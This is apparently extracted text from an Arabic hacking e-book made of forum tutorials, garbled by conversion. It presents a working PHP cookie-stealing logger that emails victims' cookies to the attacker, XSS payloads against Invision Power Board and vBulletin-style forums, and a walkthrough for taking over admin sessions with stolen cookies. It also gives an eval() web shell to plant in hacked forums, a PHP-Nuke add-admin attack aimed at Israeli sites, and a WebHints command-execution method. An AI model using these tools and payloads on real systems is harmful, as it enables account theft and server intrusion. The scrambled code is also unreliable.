‫واحفظه بامتداد‪ php‬‬ ‫وارفعه على موقعك او على موقع ليكوس‪ ‬‬ ‫وأخص بالشكر ھنا لخي العزيز‪ Devil­00 ‬لبرمجته ھ ذا اللوج الكثر من رائع‬ ‫‪ 420‬‬ ‫صراحة‪ ‬‬ ‫================‪ ‬‬ ‫ملحظه‪ * :‬‬ ‫انا لم اضع التطبیق ال لنه درس عملي فقط ل أكثر‪ ..‬‬ ‫وبإمكانك استغلله بثغره ‪ xss‬تبع‪ cPanel‬‬ ‫وغیرھا من ثغرات‪ xss‬‬ ‫وحملو كتاب القرصان عن ثغرات ‪ xss‬وفیه شفرات الـ ‪ hex‬التي تستخدم دائما‬ ‫في السكربتات الخبیثه وھ ي التي تطبق عن طريق المتصفح (( مھم جدا انك‬ ‫تعرف شفرات (( ‪ Hex‬لنھا قد توصل لبريدك المعلومات على الشكل ھذا ‪ ..‬‬ ‫‪ 02% 06%‬‬ ‫فكل من وحده لھا معنا سوف تحصلونه بالكتاب للقرصان‪ ..‬‬ ‫‪ 124‬‬ ‫‪0.1S4ALog v ,,‬لوج خفیف و دون قاعدة بیانات‪ ‬‬ ‫للكاتب‪ Devil-00:‬‬ ‫بسم االله الرحمن الرحیم‪ ,,‬‬ ‫مع سلسلة تحديثات على اللوج الموجود بالمنتدى نفسه ) النسخه ‪ 1.0‬وما‪ ‬‬ ‫فوق ) ‪ ,,‬ومع الكثیر من الشخاص الساھمو بفكرھم و تعاطیھم معنا تم والحمد‬ ‫الله انزال النسخه ‪ 0.1‬من ھذا اللوج ‪ ,,‬وھوعبارة عن سطر جديده تحتوي ما كان‪ ‬‬ ‫يحتويه اللوج القديم من النسخه الولى‪ ,,‬‬ ‫ممیزاته‪ :-‬‬ ‫المیزه الرئیسیة و ھ و من اسمه يقوم بجلب الكوكیز من ثغرات عديده و اشھرھا‬ ‫الــ ( كروس سات سكريبتنج(‪ ( { XSS‬‬ ‫يقوم بارسال الكوكیز فورا الى بريدك ول يحتاج قاعدة بیانات لیخزن المعلومات‪ ‬‬ ‫علیھا‪ ,,‬‬ ‫يقوم بعمل تمويھ ي عند اضافة حدث معین للوج و من خلله يرسل الضحیه الى‬ ‫صفحه انت تحددھا من خلل الرابط‪ ‬‬ ‫‪ ,,‬‬ ‫ان كنت من من يصلھم الكثیر من ھذه البیانات ول تفرق بینھا ‪ ,,‬تستطیع‪ ‬‬ ‫التفريق الیوم باضافة خاصة التسمیه لكل وصلة او عملیة تقوم بھا‪ ,,‬‬ ‫بقوم ايضا بعملیة فرز معینه للكوكیز و الیك المثال لتعرف كیف يصل الكوكیز‪ ,,‬‬ ‫قبل‪ :-‬‬ ‫‪;111000111=2hash=000111000;hash‬‬ ‫بعد‪ :-‬‬ ‫‪] 111000111 [2hash[ 000111000 ] hash‬‬ ‫) **لقد قال الكثیر على انه ليكوس اصبح ل يدعم البي اتش بي و قواعد‪ ‬‬ ‫البیانات و البريد لكن انا جربت اللوج على ليكوس الخدمه المجانیة و الحمد الله‪ ‬‬ ‫ارسل رساله و وصلت ول ينقص شيء** (‪ ‬‬ ‫‪ 224‬‬ ‫‪<?php‬‬ ‫]‪/* S4aLog v1.0 [ Beta ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‬ ‫>;<‪**Beta Of S4aLog v1.0 With Str_Repalce ‬‬ ‫‪! You Can Get Cookies And Refresh The Broweser ! v0.10‬‬ ‫]‪[ New New New ‬‬ ‫‪!Named Your Attack With $nm e.x‬‬ ‫‪http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies‬‬


[ MSG ] Name : Attack1 Cookies : Cookies Refresh : http://www.s4a.xx [ MSG ]! ! Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121; ! [ New New New ] */ $YourMail = "devil­00@hotmail.co.uk"; // Your E­mail /*­­­­­­­­­­­­­­­­­­­­­­­*/ $Ip = $REMOTE_ADDR; $Cooki_e = $_GET['id']; $NameOfAttack = $_GET['nm']; $Refresh = $_GET['re']; /* Start */ $ReplaceCookie1 = array("=",";"); $ReplaceCookie2 = array("[ "," ] "); $Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki _e); // Replace /* e.x hash=0210; | hash[0210]*/ //***************************************// $Hdr = "From: S4aLog <log­v1@s4a.cc>"; $Msg = " Mr Attacker ;) ,,, S4aLog v1 Beta << [ ".$NameOfAttack." ] ,, Name Of Attack [ ".$Refresh." ] ,, Refresh Page [ ".$Ip." ] ,, Ip [ S4aLog < By Devil­00 > ­­ Thnx For ­­ <Yes2Hack> <xxx (hacker)> <s4a Members> ] [ devil­00@hotmail.co.uk ­ devil.00@gmail.com ] ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ Cookie :: 423 ".".$Cooki_e ;" /* ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ */ ;)$Send = mail($YourMail,"S4aLog ­­ NewLog",$Msg,$Hdr **************************************************/ /*************************** {)if($Send };)if($Refresh <> ""){header("location:".$Refresh } >? :-‫ما علیك ال تعديل البريد الموجود بالكود الرئیسي‬ $YourMail = "devil­00@hotmail.co.uk"; // Your E­mai :-‫وطريقة الستعمال‬ http://site/log.php?nm=Attack1&re=http://www.s4a.cc&id=test ,,‫لتسمیة العملیة التي تقوم بھا‬ nm >> ‫حیث ان المتغیر الول وھو الـ‬


‫والمتغیر الثاني و ھو الـ >> ‪ re‬الصفحة التي توھم من خللھا الضحیة انوه‪ ‬‬ ‫دخلھ ا ‪ ..‬يفضل ان تكون الموقع الرئیسي او المنتدى او حسب الثغره مثل‪ ‬‬ ‫الفلش ‪ ,,‬اجعل اللوج ينقله الى الفلش ( فكرة الخ ‪ xxx‬من متابعتي لموضوع‪ ‬‬ ‫ربط اللوج بالفلش)‪ ‬‬ ‫واخیرا مثل ما حنا متعودين الـ >> ‪ id‬كود الجافا سكريبت ( على ھوا الثغره)‪ ‬‬ ‫‪ 424‬‬ ‫اكتشاف ثغره حديثه ‪ Invision Power Board‬من ‪ 3.0.2‬‬ ‫وماتحت‪ ‬‬ ‫للكاتب‪ Linux_Drox:‬‬ ‫مادري وش جاني ولكن تحمست شوي لھا واكتشفت الثغره وھي من نوع‪ ‬‬ ‫‪ xss‬‬ ‫وانا المكتشف والله الحمد‪ ‬‬ ‫اول ماكتشفتھا نزلتھا ھنا‪ ‬‬ ‫ولكن لن أتحدث عن الثغره كثیرا ول عن الكتشاف وسوف اكتفي بوضعھا ھنا‪ ‬‬ ‫كود‪ PHP:‬‬ ‫‪ .http://xxx.com/forums/index.php?act=idx='><script>alert(document‬‬ ‫‪ >******)</script‬‬ ‫الثغره الثانیه بملف المساعده اكتشفتھا منذ قلیل‪ ..‬‬ ‫كود‪ PHP:‬‬ ‫‪ http://www.xxxxx.com/forums/index.php?act=Help='><script>alert(d‬‬ ‫‪ >ocument.******)</script‬‬ ‫وھذه ايضا بملف التحكم ( الملف الشخصي(‪ ‬‬ ‫كود‪ PHP:‬‬ ‫‪http://xxx.com/forums/index.php?act=UserCP&CODE=00='><script>a‬‬ ‫‪ >lert(document.******)</script‬‬ ‫‪ 524‬‬ ‫وھذه بملف البحث اكتشفتھا قبل شوي‪ ...‬‬ ‫كود‪ PHP:‬‬ ‫&‪http://xxxx.com/forums/index.php?act=Search&nav=lv&CODE=show‬‬ ‫‪search_in=topics&result_type=topics&lastdate='><script>alert(docum‬‬ ‫>‪ ent.******)</script‬‬ ‫وھ ذه بملف العضاء او بمعنى اخر مشاھده عضو‪ ..‬‬ ‫كود‪ PHP:‬‬ ‫‪http://XXX.com/forums/index.php?showuser=720='><script>alert(doc‬‬ ‫>‪ ument.******)</script‬‬ ‫ھنا رقم ‪ 026‬استبدله برقم عضويتك مثل ملحظه لو تستبدل الرقم بلمشرف‪ ‬‬ ‫العام نفس الشيء راح يطلع الكوكیز تبعك أنت‪ ‬‬ ‫وھنا ايضا اكتشاف جديد‪ ‬‬ ‫بملف شروط الكتابه‪ ‬‬ ‫كود‪ PHP:‬‬ ‫‪http://www.XXX.com/forums/index.php?act=boardrules='><script>ale‬‬ ‫>‪ rt(document.******)</script‬‬ ‫وھنا في ملف الصوره الشخصیه للعضو ھذه ثغره موجوده بھا ايضا‪ ...‬‬ ‫كود‪ PHP:‬‬ ‫‪http://xxxx.com/forums/index.php?act=UserCP&CODE=photo='><scri‬‬ ‫>‪ pt>alert(document.******)</script‬‬ ‫ملحظه ھامه جدا‪ :‬‬ ‫‪ 426‬‬ ‫استبدل **** بـ ‪ c o o k i e‬اشبكھا طبعا لنھا ھنا مشفره!‪ ‬‬ ‫وطريقه ربطھا باللوج وضعتھا بموضوع مسحب‪ ‬‬


‫شروط الثغره‪ :‬‬ ‫‪1‬ان يكون الصدار من ‪ 3.0.2‬وما تحت اي قبل الخیر ھذا الصدار‬‫‪2‬ان تكون كـ عضو‪ ‬‬‫‪ 724‬‬ ‫شرح احدى ثغرات الصندوق السحري‪ ‬‬ ‫للكاتب‪ 7sLicJI & Dr.Jr :‬‬ ‫الشرح راح يكون لحد ثغرات ‪ xss‬وھى ثغرة الفلش واعتقد بعضكم يعرف‪ ‬‬ ‫طريقتھاا‪ ‬‬ ‫بس حبیت اقدمھا للي مايعرفون كیفیة استغللھا واللى يقول صعب الستغلل‬ ‫مع انه واالله سھل‪ ‬‬ ‫طبعا اخونا العندلیب اكتشف ثغرة في الصندوقین السحري والماسي ‪ ،‬ثغرة‪ ‬‬ ‫الفلش ‪ ،‬ثغرة الريلر بلیر ‪ ،‬‬ ‫ثغرة تنسیق القصیدة ‪ ،‬‬ ‫ياالله نبي الشرح بس قبل ل ابدي ابي منكم تقرؤون ھالعبااره‪ ‬‬ ‫إقسم باالله اننى ل استخدمھا ضد اخوانى المسلمین والعرب‪ ‬‬ ‫وتم التطیق على منتدى معین وجانى الكوكیز بآقل من دقیقه‪ ‬‬ ‫ياالله نبدي الشرح‪ ‬‬ ‫بسم االله الرحمن الرحیم‪ ‬‬ ‫إول شيء ھ ذا اللوجو من برمجة اخونا ديفیل االله يعطیه الف عاافیه‪ ‬‬ ‫كود‪ PHP:‬‬ ‫‪ <?php‬‬ ‫‪ ] /* S4aLog v1.0 [ Beta‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ >;< **Beta Of S4aLog v1.0 With Str_Repalce‬‬ ‫‪ 01.0! You Can Get Cookies And Refresh The Broweser ! v‬‬ ‫‪ ] [ New New New‬‬ ‫‪ 824‬‬ ‫‪ !Named Your Attack With $nm e.x‬‬ ‫‪[url]http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies[/‬‬ ‫]‪ url‬‬ ‫]‪ [ MSG ‬‬ ‫‪ Name : Attack1‬‬ ‫‪ Cookies : Cookies‬‬ ‫]‪ Refresh : [url]http://www.s4a.xx[/url‬‬ ‫!]‪ [ MSG ‬‬ ‫!‪ ‬‬ ‫‪ Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old‬‬ ‫;‪ bbpassword=12121; bbhash=12121‬‬ ‫!‪ ‬‬ ‫]‪ [ New New New ‬‬ ‫‪ */‬‬ ‫‪ $YourMail = "i.7@hotmail.com"; // Your E­mail‬‬ ‫‪ /*­­­­­­­­­­­­­­­­­­­­­­­*/‬‬ ‫;‪ $Ip = $REMOTE_ADDR‬‬ ‫;]'‪ $Cooki_e = $_GET['id‬‬ ‫;]'‪ $NameOfAttack = $_GET['nm‬‬ ‫;]'‪ $Refresh = $_GET['re‬‬ ‫‪ /* Start */‬‬ ‫;)";"‪ $ReplaceCookie1 = array("=",‬‬ ‫;)"‪ $ReplaceCookie2 = array("[ "," ] ‬‬


$Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki _e); // Replace /* e.x hash=0210; | hash[0210]*/ //***************************************// $Hdr = "From: S4aLog <log­v1@s4a.cc>"; $Msg = " Mr Attacker ;) ,,, S4aLog v1 Beta << [ ".$NameOfAttack." ] ,, Name Of Attack [ ".$Refresh." ] ,, Refresh Page 429 [ ".$Ip." ] ,, Ip [ S4aLog < By Devil­00 > ­­ Thnx For ­­ <Yes2Hack> <xxx (hacker)> <s4a Members> ] [ [email]devil­00@hotmail.co.uk[/email] ­ [email]devil.00@gmail.com[/email] ] ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ Cookie :: ".$Cooki_e." "; /* ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ */ $Send = mail($YourMail,"S4aLog ­­ NewLog",$Msg,$Hdr); /************************************************** ** *************************/ if($Send){ if($Refresh <> ""){header("location:".$Refresh);} } ?> ‫الحین ارفع اللوجو على النت لكن في ملااحظه بسیطه وھى غیر اليمیل‬ ‫الموجود بالوجو ليمیلك‬ $YourMail = "i.7@hotmail.com"; ‫وبعد التغیر اعمل حفظ وارفع اللوجو على النت‬ ‫والحین راح تتم التجربه على ثغرة الفلش وھى من ثغرات الصندوق السحري‬ ‫وھذا كود الثغره‬ :‫كود‬ [flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(documen t.cookie);'[/flash] 430 ‫وتم ربط اللوجو لكي ليصعب على المبتدئین‬ :‫كود‬ ­[flash=http://www.athab.com/card/images/swf/al jar7.swf]onmouseover='location.href="http://www.xxx.com/log.php?n ­m=al "=battar.net&re=http://www.xxxx.com/vb/showthread.php?t=1245&id +document.******'[/flash ‫لحین ياشباب ندخل بالمتغیرااات‬ ‫اول‬ www.athab.com/card/images/swf/al­jar7.swf ‫لرابط الفلش اللى تبیه ويفضل يكون حجمه صغیر‬


‫ثانیاا‪ ‬‬ ‫‪ www.xxx.com/log.php‬‬ ‫ھذا رابط اللوجو بعد ماحفظته ورفعته لموقعك يعني تحط الرابط الموجود‪ ‬‬ ‫بموقعك بعد عملیة التعديل‪ ‬‬ ‫ثالثاا‪ ‬‬ ‫‪ 5421=http://www.xxx.com/vb/showthread.php?t‬‬ ‫ھذا ياشباب مھ م يعني مثل اى واحد يمر المآوس قدام الفلش راح يوديیه‪ ‬‬ ‫للصفحه الموجوده بالكود‪ ‬‬ ‫‪ 134‬‬ ‫وانا انصحك تحط يرجع لنفس الصفحه الموجود فیھا الفلش عشان ل يشك‪ ‬‬ ‫الضحیه‪ ‬‬ ‫ونشكر اخونا ديفیل لن طور اللوجو لن اول لوجو لمريت المآوس يوديك لصفحه‬ ‫بیضه‪ ‬‬ ‫وجزاه االله خیر دع الخیاار لناااا االله يوفقه في الوجو الجديد ) المطور(‪ ‬‬ ‫ملحظه ( إكید بعضكم يبي يقول شلؤن اعرف انه ھذا الكوكیز لى منتدى)‪ ‬‬ ‫اجابة السؤال الخیآر الثالث بالكوكیز وھى الصفحه المراد الذھاب لھا بعد مررو‪ ‬‬ ‫مآوس الضحیه امام الفلش‪ ‬‬ ‫راح تجیك داخل الرساله وجذى تعرف لى منتدى ھذا الكوكیز‪ ‬‬ ‫الحین ھذى شكل الرساله اللى راح توصلك ( بھذا الشكل )‪ ‬‬ ‫******‪ :: ‬‬ ‫‪ [bbsessionhash[ 6b0e3ffbe27bc928936aba42f3523efa ] bblastvisit‬‬ ‫‪ ] 3107189111‬‬ ‫‪ [bblastactivity[ 1119817959 ] bbforum_view‬‬ ‫‪ ] _3523e417e8fb0bc834d2abaf8f9eb54cax1x­ix2yix1119817237y‬‬ ‫‪ [bbthread_lastview‬‬ ‫‪ ­cf56fed12e97ac29c33812245fe8e28aax1x‬‬ ‫‪ [ix1985ysx10x\"1111907592\"y_ ] bbuserid‬‬ ‫‪ 0376224 ] bbpassword[ 9360b6686129d3d676df4e6974e8f‬‬ ‫المھم بالرساله كله التالى‪ ‬‬ ‫‪ bbpassword‬‬ ‫‪ bbuserid‬‬ ‫‪ bblastactivity‬‬ ‫‪ 234‬‬ ‫‪ bblastvisit‬‬ ‫واكید لزم تكون مسجل بالمنتدى اللى ودك تدخل بنك الدمن فیه‪ ‬‬ ‫الحین نطلع اللى نبیه من الكوكیز اللى وصل لنا باليمیل‪ ‬‬ ‫‪ bbpassword‬‬ ‫‪ 0379360b6686129d3d676df4e6974e8f‬‬ ‫‪ bbuserid‬‬ ‫‪ 4226‬‬ ‫‪ bblastactivity‬‬ ‫‪ 9597189111‬‬ ‫‪ bblastvisit‬‬ ‫‪ 3107189111‬‬ ‫الن إفتح برنامج الكوكیز‪ ‬‬ ‫الن بعد تسجیل الدخول التلقائي بالمنتدى نغلق صفحة المنتدى‪ ‬‬ ‫والحین نفتح البرنامج ونعدل الكوكیز كما بالصوره‪ ‬‬ ‫ملحظه ‪ bb‬مو بكل المنتديات تبدآ بكل كلمه مثل منتديات تبدآ بـ ‪ rr‬شيء‪ ‬‬ ‫عـآدى‪ ‬‬ ‫والن بعد التعديل إغلق البرنامج واذھب للمتصفح واذھب للمنتدى سوف ترى‬


‫انك‪ ‬‬ ‫اصبحت ادمن‪ ‬‬ ‫‪ 334‬‬ ‫تمت التجربه على عده منتدياات بنجااااح‪ ‬‬ ‫والثغره لزالت شغاله واستغللھاا سھل مثل ماتشووفوون‪ ‬‬ ‫الترقیع‪ ‬‬ ‫كلمة ‪ c o o k ie‬اجعلھ ا من ظمن الكلمات الممنوعة طبعا لتنسى التفعیل‬ ‫وخلص الحین تقفلت الثغرة ؟ كما تلحظون‪ ‬‬ ‫كلمة ‪ c o o ki e‬جلعت بین الحروف مسااافة لني لو كتبتھا عااادية‪ ‬‬ ‫سوف تطلع على شكل نجوم‪ ‬‬ ‫لتحمیل اللوجو مع كود الثغره ھنا‪ ‬‬ ‫تحمیل‪ ‬‬ ‫‪ 434‬‬ ‫طريقة رفع الشل في منتدي مخترق‬ ‫للكاتب ‪ Super_RedHat :‬‬ ‫الیكم الطريقة‪ ‬‬ ‫عندم يتم اخرق اي منتدي وعند الدخول الي لوحة اتحكم‪ ‬‬ ‫ھكذا ‪ www.xxx.com/vb/admin‬‬ ‫روح حق خیار‪ smilies‬‬ ‫رح تحصل تحتة بظبط‪ ‬‬ ‫‪ Add ­ Modify ­ Upload‬‬ ‫اختر انت ‪ Upload‬‬ ‫رح تظھر صفحة وفیه مكان لرفع ملف‪ ‬‬ ‫استعرض بعد ذلك‪ ‬‬ ‫انزل تحت واضغط ‪ Upload‬وراح ينزل الملف‪ ‬‬ ‫ويكون كذا‪ ‬‬ ‫‪ www.xxxx.com/vb/images/smilies/shell.php‬‬ ‫‪ ::::::::::‬‬ ‫طريقة وھي الفضل عندي‪ ‬‬ ‫انك تروح اتمبلت‪ ‬‬ ‫‪ 534‬‬ ‫وبحث عن كلمة‪ ‬‬ ‫‪ phpinclude‬‬ ‫وحط الى تبغا من كود لئه ھذا‪ phpinclude ‬يطبق لك الومر بسھوله‬ ‫اقصد الومر ھي اومر لینكس طبقة من المتصفح‪ ‬‬ ‫ھذا الكود‪ ‬‬ ‫‪ // This code is PHP4 only:‬‬ ‫;)(‪ // ob_start‬‬ ‫)]'‪ if($_GET['x‬‬ ‫{‪ ‬‬ ‫;]'‪ $X = $_GET['x‬‬ ‫}‪ ‬‬ ‫)]'‪ if($_POST['x‬‬ ‫{‪ ‬‬ ‫;]'‪ $X = $_POST['x‬‬ ‫}‪ ‬‬ ‫)''‪ if($X != ‬‬ ‫{‪ ‬‬ ‫))(‪ if(get_magic_quotes_gpc‬‬ ‫{‪ ‬‬


‫;))‪ eval(stripslashes($X‬‬ ‫}‪ ‬‬ ‫‪ else‬‬ ‫{‪ ‬‬ ‫;)‪ eval($X‬‬ ‫}‪ ‬‬ ‫;‪ exit‬‬ ‫}‪ ‬‬ ‫‪ 436‬‬ ‫;)"‪ // require("yourheader.html‬‬ ‫;)(‪ // $header = ob_get_contents‬‬ ‫;)(‪ // ob_end_clean‬‬ ‫‪437‬‬ ‫شرح ‪ Nuke 7.4 Add Admin‬بالصور‪ ‬‬ ‫للكاتب‪ forhacker :‬‬ ‫نبدا الشرح‪ ‬‬ ‫قم بتنزيل ھذا الملف اول‪ ‬‬ ‫كلیك يمین حفظ باسم‪ ‬‬ ‫باسورد فك الطغط‪ /http://www.hacker4.net :‬‬ ‫==============‪ ‬‬ ‫الن قوم بالبحث عن المواقع المصابه فى ھذا الموقع السرائیلى‬ ‫‪ /http://www.walla.co.il‬‬ ‫واكتب‪ ‬‬ ‫‪ by PHP­Nuke. All Rights Reserved+co.il‬‬ ‫=========‪ ‬‬ ‫‪ 834‬‬ ‫ثم جرب الدخول الى اى موقع واكتب جنبه‬ ‫‪ /admin.php‬‬ ‫سوف يظھر لك ھذا‪ ‬‬ ‫=========‪ ‬‬ ‫ثم قوم بفتح الملف بواسطه ال ‪ notepad‬‬ ‫واكتب اسم الموقع كما بالصوره‪ ‬‬ ‫‪ 934‬‬ ‫لحظ وجود ‪ admin.php/‬‬ ‫===‪ ‬‬ ‫ثم قم بالحفظ وافتح الملف بصیغه ‪ html‬‬ ‫كما بالصوره‪ ‬‬ ‫‪044‬‬ ‫واتبع التعلیمات فى الصوره ثم اطغط‪ ‬‬ ‫‪ create admin‬‬ ‫سوف يظھر لك ھذا الشكل اتبع التعلیمات‬ ‫‪ 144‬‬ ‫====‪ ‬‬ ‫ثم اطغط ‪ login‬‬ ‫تم الختراق بحمد االله‪ ‬‬ ‫مبرووك علیك انت فى لوحه التحكم‪ ‬‬ ‫‪244‬‬ ‫كیفیة استغلل ثغرة ‪ WebHints‬‬ ‫للكاتب‪ Soofaa:‬‬ ‫ثغرة ‪ ­­>WebHints‬المنتشرة لدى المواقع المريكیة وفائدة الثغرة تفیدك في‬


‫في تطبیق اوامر اللینكس على سیرفر الموقع وصدقوني الثغره سھلة‪ ‬‬ ‫لكن يبغالھا شوية تركیز خلیكم معاي‪ ‬‬ ‫‪ ...:::...::::...:::...:::...:::...:::...:::...:::...:::...:::...:::...:::...:::...:::‬‬ ‫اول نقوم بالذھ اب الى محرك بحث جوجل ‪ :-‬‬ ‫الدخول الى جوجل‪ ‬‬ ‫نتابع باقي الشرح في الصور ‪ ....‬‬ ‫‪ 344‬‬ ‫ھ ذا واالله اعلم ارجو ان الثغره تكون قد نالت رضاكم واشوف بصراحة انھا‪444445 ‬‬ ‫سھلة جدا بالذات ھ النوع من الثغرات لتطبیق الوامر‪ ....‬‬ ‫وھ اذي مجموعة من المواقع المصابة كل الي علیك ادخل واخترقھا‪ ‬‬ ‫الول الموقع‪ ‬‬ ‫الثاني الموقع‪ ‬‬ ‫الثالث الموقع‪ ‬‬ ‫الرابع الموقع‪ ‬‬ ‫الموقع‪ ‬‬ ‫الخامس‬ ‫الموقع‪ ‬‬ ‫السادس‬ ‫السابع الموقع‪ ‬‬ ‫الثامن الموقع‪ ‬‬ ‫كانت ھاذي بعض المواقع لیتمرن علیھ ا الشباب وتذكروا كل واحد ونوع بحثه‬ ‫‪ 644‬‬ ‫أساسیات إكتشاف وإستغلل ثغرات أنظمة التشغیل‪447 ‬‬ ‫للكاتب‪ jaas:‬‬ ‫توقعت أن أكتب ھذا الموضوع وأنتھي منة في ‪ 3‬أيام ‪ ,‬ولكن مرت ھذة اليام‪ ‬‬ ‫وأنا لم أعرف من أين ابدأ‪ ‬‬ ‫والسبب قد يكون في تشعب الموضوع لدرجة أننا في ھذة السلسلة من‪ ‬‬ ‫الدروس سنذكر كل لغات البرمجة‪ ‬‬ ‫ب وسنقوم بإستخدامھ ا ‪ ,‬سندخل في مواضیع الشبكات و البرامج و ا‪ ‬‬ ‫تقري ً‬ ‫النظمة وأخیًر المعالج والذاكرة‪ ‬‬ ‫ا‪ ‬‬ ‫قد نناقش كل مايتعلق بالكمبیوتر بشكل عام لكي نعرف ماھي متطلبات أو‪ ‬‬ ‫خبرات كاشف الثغرات(الھكر)؟!!!‪ ‬‬ ‫ھذة السلسلة من الدروس قد تأخذ ‪ 4‬مواضیع أتوقع أن أنتھي منھا في شھر‬ ‫ھذا إذا لم ندخل في تفاصیل كثیرة‪ ‬‬ ‫سنبدأ في شرح الثغرات وكیفیة إكتشافھ ا مع أمثلة تطبیقیة على ثغرات‪ ‬‬ ‫حقیقیة تم إكتشافھا‪ ‬‬ ‫سنتعرف على أمور قد تندھش من غرابتھا ؟‪ ‬‬ ‫ھ ل تعلم بوجود طرق لختراق الجھزة فقط تتطلب رقم (‪ (ip‬ثغرات أنظمة‪ ‬‬‫التشغیل‪ ‬‬ ‫فقط بمجرد دخول صفحة إنترنت(فتح رسالة ) أودخول موقع ‪ ,‬يمكن إختراق‪ ‬‬‫جھ ازك ( ثغرات البرامج‪ -‬المتصفح)‪ ‬‬ ‫‪ 844‬‬ ‫بعض الفايروسات أو الديدان تدخل لجھازك فقط بمجرد وصل الجھاز بالنترنت‪ ‬‬‫ثغرات أنظمة‪ ‬‬ ‫­‪ ‬‬ ‫والغرب من ھذا سنتعرف على تقنیة أو طريقة ‪ ShellCode‬وإستغلل الثغرات‪ ‬‬ ‫وسنبدأ بمثال ‪ :‬التحكم في سیر التنفیذ لنظام التشغیل من خلل ‪ -‬تتوقع ماذا‬ ‫؟!! ملف نصي‪ txt‬‬ ‫بعد ھذا الموضع أتوقع أنك ستنسى كل ماھ و مألوف في أنظمة التشغیل ‪ -‬‬ ‫وستتأكد من المقولة‪ ‬‬ ‫كل شيء ممكن ؟! وخاصة في البرمجة‪ ....‬‬


‫البداية ‪ :‬ثغرات أنظمة التشغیل‪ ‬‬ ‫لو سألت ‪ ,,‬ھ ل يمكن التغییر في ملف تنفیذي وطريقة عملة ؟! أكید ستجد‪ ‬‬ ‫الجواب نعم‪ ‬‬ ‫والمثلة على ذلك البرمجة العكسیة والكراك والباتش ‪ .....‬‬ ‫كل ھ ذة المثلة تغیر في كود الملف التنفیذي ‪ ,,‬والتغییر في الكود بالتأكید يغیر‬ ‫في طريقة عمل الملف‪ ‬‬ ‫والن لو سألت ھذا السؤال ؟!‪ ‬‬ ‫ھل يمكن التغییر في طريقة عمل ملف تنفیذي دون التغییر في كود الملف‪ ‬‬ ‫؟؟؟؟؟!‪ ‬‬ ‫أنا متأكد أن يكون جواب كل العقلء والخبراء والمبرمجین ھ و ‪ :‬للللل وألف ل‪ ‬‬ ‫(عني ماتدخل العقل )‪ ‬‬ ‫ولكن ظھ ر لنا مجنون وقال ممكن لیش ل ‪ ,‬وبدأ يبحث عن طريقة ‪ -‬ھل تصدقون‬ ‫‪ 944‬‬ ‫أنة وجدھا‪ ‬‬ ‫ولكن بشرط وھو حدوث خطأ ‪ ,‬أھم شيء تعرفة في ھذة المرحلة ھو القانون‪ ‬‬ ‫التالي‪ :‬‬ ‫يمكن التغییر في طريقة عمل ملف تنفیذي دون التغییر في الكود بشرط حدوث‬ ‫خطأ‪ ‬‬ ‫أريد أن أسال عندما نستخدم برنامج ويحدث خطأ أين ينتقل التنفیذ ؟! ھل‪ ‬‬ ‫يخرج من البرنامج ؟‪ ‬‬ ‫ماذا لو إستطعنا التحكم في مجرى التنفیذ ووجھناة لنقطة معینة ‪ ,‬ھل‪ ‬‬ ‫المطلوب التغییر في كود البرنامج؟ !‪ ‬‬ ‫أجوبة ھذة السئلة ‪ :‬ل‪ ‬‬ ‫سؤقرب لك ما أريد إصالة ‪ :‬بمثال تطبیقي ‪ ,‬أعتقد أنھا أسھل طريقة‪ ‬‬ ‫مثالنا الول عبارة عن برنامج ھ ذا البرنامج يبحث عن ملف نصي في نفس‪ ‬‬ ‫المجلد‪ ‬‬ ‫بعد أن يجدة يقوم بقرائة محتواة وعرضھا بداخل أداة نص ‪ edit‬او‪ textbox‬‬ ‫ونحن بدورنا سنقوم بالكشف عن خطأ في ھ ذا البرنامج ومن خلل الخطأ‪ ‬‬ ‫سنبحث عن ثغرة‪ ‬‬ ‫تمكننا من إدخال كود برمجي وتنفیذة وتغییر مجرى البرنامج ‪ ,,‬دون التغییر في‬ ‫كود البرنامج الصلي‪ ‬‬ ‫فقط سنغیر في محتوى الملف النصي ( من خلل محرر ھكس )‪ ‬‬ ‫وسنتعرف في ھ ذا المثال على أكثر الثغرات إنتشارا في أنظمة التشغیل وھي‬ ‫‪overflow‬أو أخطاء الفیض‪ ‬‬ ‫‪ 054‬‬ ‫ستجد في ھ ذة الرابط مثالنا ‪ ,‬البرنامج ‪ +‬الشفرة المصدرية ( أخرج الملفات‪ ‬‬ ‫إلى مجلد(‪ ‬‬ ‫‪ http://www.arabteam2000.com/files/Code/files/myexp0a.zip‬‬ ‫عندما تشغل البرنامج ستجد أمر‪ Read file ‬عندما تضغط علیة ‪ ,‬فإن البرنامج‪ ‬‬ ‫يقوم بقرائة‪ ‬‬ ‫محتويات الملف النصي‪ info.txt ‬ھ ذا الملف النصي موجود في نفس مجلد‪ ‬‬ ‫البرنامج‪ ‬‬ ‫ويعرض المحتوى داخل أداة النص ‪ ,‬ولو ألقینا نظرة على الكود الذي يقرأ الملف‪ ‬‬ ‫الدالة)‪ ( Rfile ‬‬ ‫لوجدنا التالي‪ :‬‬ ‫)‪BOOL Rfile(HWND mhWnd‬‬ ‫{‬ ‫;‪HANDLE hfile=(HANDLE)­1‬‬ ‫;‪DWORD nbt=0‬‬ ‫لحظ حجم مصفوفة الحروف‪// ‬‬


